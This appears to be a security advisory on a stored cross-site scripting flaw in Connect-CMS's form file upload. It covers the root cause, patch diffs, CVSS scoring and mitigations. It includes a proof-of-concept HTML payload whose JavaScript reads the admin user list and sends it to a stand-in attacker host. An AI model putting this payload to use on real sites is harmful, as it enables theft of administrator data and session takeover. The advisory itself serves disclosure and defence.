CVE-2026-32278: Stored Cross-Site Scripting (XSS) via Unrestricted File Upload in Connect-CMS

Connect-CMS is a PHP/Laravel-based content management system that provides modular functionality through plugins. The Form Plugin is a core component that allows site administrators to construct custom public-facing forms. One of the available field types is the "File" field, which enables unauthenticated external users to upload documents as part of their form submission.

The vulnerability, tracked as CVE-2026-32278 and GHSA-mv3p-7p89-wq9p, represents a severe implementation flaw in how these user-uploaded files are processed and served. The application fails to restrict dangerous file types at the point of upload. Consequently, the flaw is classified under CWE-434: Unrestricted Upload of File with Dangerous Type, which subsequently facilitates Stored Cross-Site Scripting (XSS).

When a user uploads a file, the system stores it on the server without sanitizing its contents or enforcing a strict whitelist of safe extensions. The critical failure occurs when the uploaded file is requested back from the server. The application dictates how the browser should handle the file based on its extension, and prior to the patch, the system explicitly instructed the browser to render .html files inline rather than forcing a download.

The impact of this vulnerability manifests when an authenticated administrator accesses the backend dashboard to review form submissions. If the administrator clicks the link to view a maliciously crafted HTML file, the embedded JavaScript executes within the administrator's browser session. This execution occurs on the same origin as the CMS, granting the script full access to session cookies, CSRF tokens, and the administrative API.

The root cause of CVE-2026-32278 lies in the file rendering logic located within app/Http/Controllers/Core/UploadController.php. When an HTTP request is made to retrieve an uploaded file, this controller determines the appropriate Content-Disposition header based on the file's extension. The Content-Disposition header dictates whether the browser will attempt to display the file inline or prompt the user to download it as an attachment.

In vulnerable versions of Connect-CMS, the controller contained a hardcoded array of file extensions that were deemed safe for inline rendering. This array erroneously included the html extension. By explicitly permitting .html files to be served with Content-Disposition: inline, the application guarantees that any HTML payload stored on the server will be processed and rendered by the viewing browser.

Compounding this issue was a lack of strict input validation within the Form Plugin's submission handling logic. The application did not enforce comprehensive checks on the MIME type or the file extension during the initial upload phase. Unauthenticated users interacting with the "File" field could bypass standard superficial client-side restrictions and directly POST HTTP requests containing .html files.

The intersection of these two flaws creates the complete exploit chain. The unrestricted upload allows the introduction of the malicious payload into the system's storage, while the flawed rendering logic guarantees the payload's execution when accessed. The vulnerability relies entirely on the server's misclassification of HTML documents as safe inline content.

The remediation for CVE-2026-32278 involves multiple code changes across the Connect-CMS codebase to enforce defense-in-depth. The primary fix addresses the rendering logic in UploadController.php. The developers removed html from the array of extensions permitted for inline display.

// File: app/Http/Controllers/Core/UploadController.php
@@ -162,7 +162,6 @@ public function getFile(Request $request, $id = null)
             'jpe',
             'jpeg',
             'gif',
-            'html',
         ];

By removing the html extension, the controller falls back to a default behavior of appending a Content-Disposition: attachment header to the HTTP response. When the browser receives this header, it downloads the file to the local disk rather than rendering the HTML and executing any embedded scripts. This effectively neutralizes the XSS vector even if a malicious file exists on the server.

To address the root cause of the unrestricted upload, the developers introduced strict validation classes: CustomValiUploadExtensions and CustomValiUploadMimetypes. These classes are integrated into app/Plugins/User/Forms/FormsPlugin.php to validate both the file extension and the server-detected MIME type during the submission process.

// app/Plugins/User/Forms/FormsPlugin.php (Patch Excerpt)
if ($forms_column->column_type == FormColumnType::file) {
    $validator_rule[] = 'file';
    $allowed_extensions = $this->getFormsColumnUploadExtensions($forms_column);
    $validator_rule[] = new CustomValiUploadExtensions($allowed_extensions);
    $validator_rule[] = new CustomValiUploadMimetypes($allowed_mimetype_map, $allowed_extensions);
}

This dual approach ensures completeness. The validation rules prevent the initial upload of unauthorized file types, restricting attackers from storing payloads. Simultaneously, the UploadController update ensures that if an HTML file bypasses validation through unforeseen logic errors, it will still be downloaded safely rather than executed.

Exploitation of CVE-2026-32278 requires the target application to have a publicly accessible form configured with a "File" upload field. The attacker does not need prior authentication to the application, fulfilling the PR:N (Privileges Required: None) metric of the CVSS scoring. The attacker initiates the exploit by crafting a malicious HTML document.

The payload within the HTML document typically consists of JavaScript designed to execute administrative functions or exfiltrate sensitive data. Because the script will execute within the context of the authenticated administrator, it inherits all permissions associated with that session.

<html>
  <body>
    <script>
      // Fetch user list using admin privileges and exfiltrate
      fetch('/manage/user/list')
        .then(r => r.text())
        .then(data => {
          new Image().src = 'https://attacker.com/log?c=' + btoa(data);
        });
    </script>
  </body>
</html>

After crafting the file, the attacker submits the form, uploading the malicious document. The system processes the submission and stores the file on the server. The attacker must then wait for an administrator to log into the backend and review the form submissions.

When the administrator clicks the link to view the uploaded file, the server responds with the file content and Content-Disposition: inline. The administrator's browser renders the HTML, triggering the JavaScript. The script silently performs the programmed actions, such as extracting the user list in the PoC above, and sends the data to the attacker-controlled server.

The vulnerability carries a CVSS v3.1 base score of 8.2 (High), represented by the vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L. The Attack Complexity is defined as High (AC:H) because the successful exploitation relies on a specific sequence of events, primarily the administrative configuration of a public-facing file upload field.

The Scope metric is Changed (S:C) because the vulnerability originates in the form submission component but impacts the administrative interface and the browser execution context. The confidentiality and integrity impacts are both rated as High (C:H/I:H). Successful script execution in the administrator's browser allows an attacker to bypass all frontend security controls.

With administrative access, the attacker can perform unauthorized actions. This includes modifying website content, altering system configurations, deleting user accounts, or creating new administrative accounts. The extraction of CSRF tokens enables the attacker to forge state-changing requests directly against the application API.

While the direct availability impact is Low (A:L), the secondary consequences of administrative account compromise are severe. An attacker could intentionally deface the application, delete critical database records, or leverage the CMS configuration capabilities to execute server-side code, depending on the specific features available in the backend environment.

The primary and most effective remediation for CVE-2026-32278 is upgrading the Connect-CMS installation to a patched version. Administrators operating the 1.x series must update to version 1.41.1. Administrators operating the 2.x series must update to version 2.41.1. These versions contain the forced attachment disposition logic and the strict MIME type validation.

Post-upgrade, system administrators should actively audit all existing form configurations. The patched versions introduce new settings in the database model (rule_file_extensions and rule_file_max_kb). Administrators should configure these rules on all file fields to enforce a strict whitelist, permitting only necessary document types such as .pdf, .docx, or .jpg.

If immediate patching is not feasible, organizations can deploy mitigation strategies at the network perimeter. A Web Application Firewall (WAF) can be configured to inspect multipart/form-data uploads. WAF rules should be implemented to block HTTP POST requests where the filename parameter ends in .html, .htm, or .svg, and to inspect the file content for standard HTML tags or JavaScript keywords.

As a broader architectural security measure, development teams should consider serving all user-uploaded content from an isolated domain or subdomain (e.g., usercontent-connectcms.com). Isolating the upload delivery removes the shared origin context. If an HTML file is executed on an isolated domain, the Same-Origin Policy (SOP) prevents the malicious script from accessing cookies or API endpoints belonging to the primary application domain.